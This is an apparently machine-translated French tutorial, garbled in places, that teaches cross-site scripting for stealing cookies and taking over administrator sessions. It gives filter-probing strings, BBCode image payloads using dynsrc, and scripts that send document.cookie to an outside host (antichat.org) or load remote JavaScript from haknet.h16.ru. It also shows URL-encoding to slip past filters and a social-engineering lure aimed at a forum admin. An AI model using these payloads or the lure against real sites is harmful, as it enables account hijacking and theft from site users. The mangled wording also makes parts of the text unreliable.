Description de Xss de A à Z.



  • Xss ce Css => Cross Site Scripting
  • Comment utiliser XSS
  • Qu'est - ce XSS-attaque?
  • Quelle est XSS passive et active?
  • Je propose donc sur spécifiquement sur la façon de trouver le site de XSS.
  • Et comment définir un filtre ou non?
  • actif XSS
  • Nous faisons toujours le type de codes
  • En tant que substitut à son lien avec Xss?


  • Xss ce Css => Cross Site Scripting

    A ne pas confondre avec le CSS XSS aussi nazvyayut
    Pour la première fois ce bug est apparu en 1997.



    Comment utiliser XSS.


    Premièrement, nous devons savoir ce que Cookie.
    Si vous savez que vous pouvez sauter.

    Cookie sert à enregistrer les informations d'identification à l'ordinateur des visiteurs du site.
    Si vous vous inscrivez sur le site sous le surnom de «blabluble», le site est conservé sur votre fichier informatique avec des cookies, qui sont codées vos données.
    Et si vous êtes l'administrateur et vous avez accès au site, et je - l'utilisateur qui a volé de vous (l'administrateur) les cookies, alors je peux aller en toute sécurité sur le site, et le site I définit comme 'admin' - Je vais avoir des privilèges administratifs.

    Pour changer (substitution volés) les cookies conseillent ispolzuvat CookieEdit un programme pour IE ou fonctions intégrées dans Opera et Firefox gratuitement.

    Pour intercepter les cookies doivent trouver un endroit en ligne où vous pouvez effectuer XSS-attaque.


    Qu'est-ce XSS-attaque?


    les attaques XSS - il est une attaque non sur le site lui-même, mais sur les utilisateurs du site.
    XSS - cette faille dans l'application du filtre.

    Il y a passive et active XSS XSS.

    Quelle est XSS passive et active?


    Passif - ce Xss, qui exigent la participation directe de la victime + a des restrictions et de la complexité spécifiques.
    Par conséquent, XSS passive est peu valorisé.
    Par exemple, vous avez besoin pour elle de marcher à travers le lien toxique qui nécessite des astuces d'ingénierie sociale.

    Actif - ce XSS, qui ne nécessite aucune action supplémentaire de la part de la victime - il est juste assez pour ouvrir la page avec votre XSS et le code Java est exécuté automatiquement.
    En raison de son automatisé, - ils sont très utiles et précieux.
    Par exemple, il y a des actifs dans les CSU BB-tags en raison de filtrage insuffisante lorsque vous laissez un message sur le forum \ Livre d'or \ le chat, qui sera toujours active avec chaque mise à jour.




    Je propose donc sur spécifiquement sur la façon de trouver le site de XSS.


    Comme je l'ai déjà écrit que XSS consiste en une étiquette, ils consistent également en html, et language = javascript).

    Javascript peut entrer en html.
    Vous pouvez être codé pour contourner le filtre. Mais plus sur cela plus tard.

    Comment puis-je savoir que le XSS passe sur place dan?
    rasprastrannёnaya Terrible type uzyavimost
    <Script> alert () </ script> Essayez d'insérer dans tous les différents domaines de ce script ... si le message est venu alors le processus de script et de remplir.

    La plupart prolifération XSS (nablyudaetsya dans tous les lieux où les pauvres filtrage):

    "> <Script> alert () </ script>

    Le point entier, ">.

    Pensons à ce que nous faisons lorsque nous entrons dans le champ "> <script> alert () </ script>, ce qui se passe?

    Nous sommes entrés dans le formulaire "> <script> alert () </ script> une certaine valeur de champ prisvaivaetsya variables. La variable est traitée,"> être mise en oeuvre, ferme

    scénario et vyprolnyaet <script> alert () </ script>

    Cette XSS est la prolifération dans les moteurs de recherche:

    Voir tous les champs du site et essayer d'insérer "> <script> alert () </ script>
    Si laissé un message - vous avez trouvé XSS ...




    Et comment définir un filtre ou non?


    Insérez simplement dans tous les domaines: '' - "<########> = & {()}
    Ensuite , ouvrez la page html et recherchez le mot "########"
    et de voir la valeur de charset suivante ..

    Si le <> et à gauche , il signe Pervan de vulnérabilité - cela signifie que le filtre a un trou.
    Si " '\ personnages restent les mêmes comme ils ont été introduits - c'est le deuxième signe de vulnérabilité - Possible caractères supplémentaires pour suivre XSS attaque.
    Puis, lors de l' ouverture du HTML, vous ne l' avez pas trouvé <> très probablement un trou dans le filtre.
    Si vous ouvrez le HTML vous trouvez que <> remplacés par d' autres caractères, il est une déception - le filtre à
    Il fonctionne normalement.
    Peut-être même entrer sur le terrain pour vérifier le filtre comme ceci: "> <> '' ', / \ @%?

    Prenons le cas si le filtre mange <>

    Dans ce cas, il existe la possibilité d'un trou.
    Par exemple, une condition de filtre est de manger un <script>, <>, et.
    Ensuite , nous essayons de script <zxcvb: alert ();

    Le filtre semble qu'il n'y a rien de dangereux dans le <IMG% 20SRC = "java script : alert (); Pas de ferme et , partant ,
    l'exécution du script.

    Toujours pas sûr si le filtre ne filtre pas le codage différent, alors vous pouvez essayer de coder le script et coller le code.

    Tout devrait essayer par essais et la recherche d'erreur pour ...
    Essayer d'entrer dans les champs et de regarder ce que nous avons reçu du filtre avec précaution.
    méthode tykov pour comprendre comment le filtre fonctionne, s'il a des défauts.
    Si le filtre est mauvais, nous pouvons toujours insérer des scripts.




    actif XSS


    Ici, il devrait être autorisé à utiliser des balises et prekryvayas eux, il est nécessaire de répondre à la demande.

    Par exemple, les tags, url, bb, img.
    Le point d'insertion entier est que nous avons besoin de construire dans une demande à l'img ou url parimetr. Nous avons beaucoup de Img mémoire de paramètres autres que src et alt.
    Ce bogue est très souvent utilisé dans le forum, livre d'or ...

    Considérons le XSS actif.

    Avertissements !!!

    Mots - clefs [fils * t], [im * g], [ur * l] pishutsa avec * afin shtoby ils ne sont pas fusionnés avec le code du site.
    Pour ispolzuvaniya supprimer ces balises *.

    Par exemple, l' affichage d' un forum pour la présence de l'utilisation de balises [fils * t], [im * g], [ur * l] et essayer de les mettre dans un script ou les combiner.:

    [Im * g] HTTR: //www.qwewqw.ru/1.jpg [/ im * g] Donc , croix ... img signifie utilisé et nous l'avons ramassé (juste le fait qu'il ya img activé et les administrateurs de la créer un message, il est enlevé, ils disent que vous ne pouvez pas inclure des photos et il est en cours d'utilisation
    forme différente) s'il n'y a pas de croix ... et bloque l'ensemble de l'inscription, puis essayez ceci:
    [Im * g src = HTTR: //www.qwewqw.ru/1.jpg]

    Eh bien, par exemple, nous avons fait cette croix:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]

    Vérifier si le filtre conserve l'espace, ajouter un espace après l'expansion jpg:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]
    si X est - alors tout est OK.

    Ensuite, il y a les options img et dynsrc lowsrc qui détiennent JavaScript. Essayez par exemple à insérer:
    [Im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    vérifier, reportez-vous - recevoir un message - puis trouvé XSS et actif peuvent insérer un script au lieu d'alert ().

    Si le filtre est pas donné, essayez ceci:
    [Im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    et
    [Im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    Si ces exemples ont transformé la croix, puis HTTR: //www.qweqw.ru/1.jpg remplacer l'adresse renifleur.

    Il y a des cas où jpg est admin désactivé.




    Nous faisons toujours les codes de type:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Mais ils n'apportera aucun bénéfice, il est juste le code de vérification (testirovki) sur Xss.

    Voici le script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Il a été volé les cookies =)




    En tant que substitut à son lien avec Xss?


    Il est très facile à ...
    Il y a quelques options faciles:

    - 1) faire ceci:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> <script> img = new Image (); img.src = "? http://antichat.org/s/HakNet.gif" + le document http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> script> où **** le site Xss.

    Ici il a compilé par le script:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Vous pouvez faire beaucoup plus comme ceci:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> script src = http :? //haknet.h16.ru/script/js.js> </ script> qui accède au http: // haknet .h16.ru / script / js.js

    et js.js est:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; = "? http://antichat.org/s/HakNet.gif" + document.cookie; img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; Cette méthode est plus fiable.

    Mais comme je l'ai écrit - il y a parfois des difficultés avec les filtres sur le site (pas de stratifiés, notre script).
    Ensuite, vous devez penser à la façon d'obtenir autour de lui.
    Vous pouvez ajouter quelque chose, quelque chose à changer, ou supprimer le script.
    Mais il y a une option plus fiable lorsque nous codons simplement un script. Pour ce faire, il y a beaucoup de prog.
    Il y a un tel site comme http://ha.ckers.org/xss.html (codeur-dekodirovschik).

    Voici un exemple:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    il a été codé:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Le cryptage est particulièrement nécessaire non seulement de tromper les filtres, mais pour la déception lors de l'utilisation PASSIVE ADMIN CSU.

    Voici un exemple, basé sur l'ingénierie sociale.
    Nous sommes à la recherche d'un contact avec l'administrateur du forum en ligne lui jeter un lien vers votre site, et tapez govorish donc "fonctionnalité intéressante est sur le site», et ainsi dale dans le même esprit.
    Et sur notre site est que vous l'aurez deviné =) UTB est le script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Ce qui rend document.location.href vous me demandez? )) .. Est un code java qui passe sans une demande par un site spécifié Cho Donc x nous obtenons, nous donnons le lien à l'administrateur, et il est venu à notre site, ce qui est le cas .. il jette rapidement

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E % 2A% 2A% 2A% 2A% 2F% %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E et il est déjà notre Xss sous forme cryptée.

    Remarque: cela ne fonctionnera que si Xss appartiendra au site d'administration où vous avez jeté le lien ...
    En d'autres mots DIFFICULTÉ PASSIVE CSU est que la vulnérabilité peut être utilisée que si la victime est consigné dans le site vulnérable !!!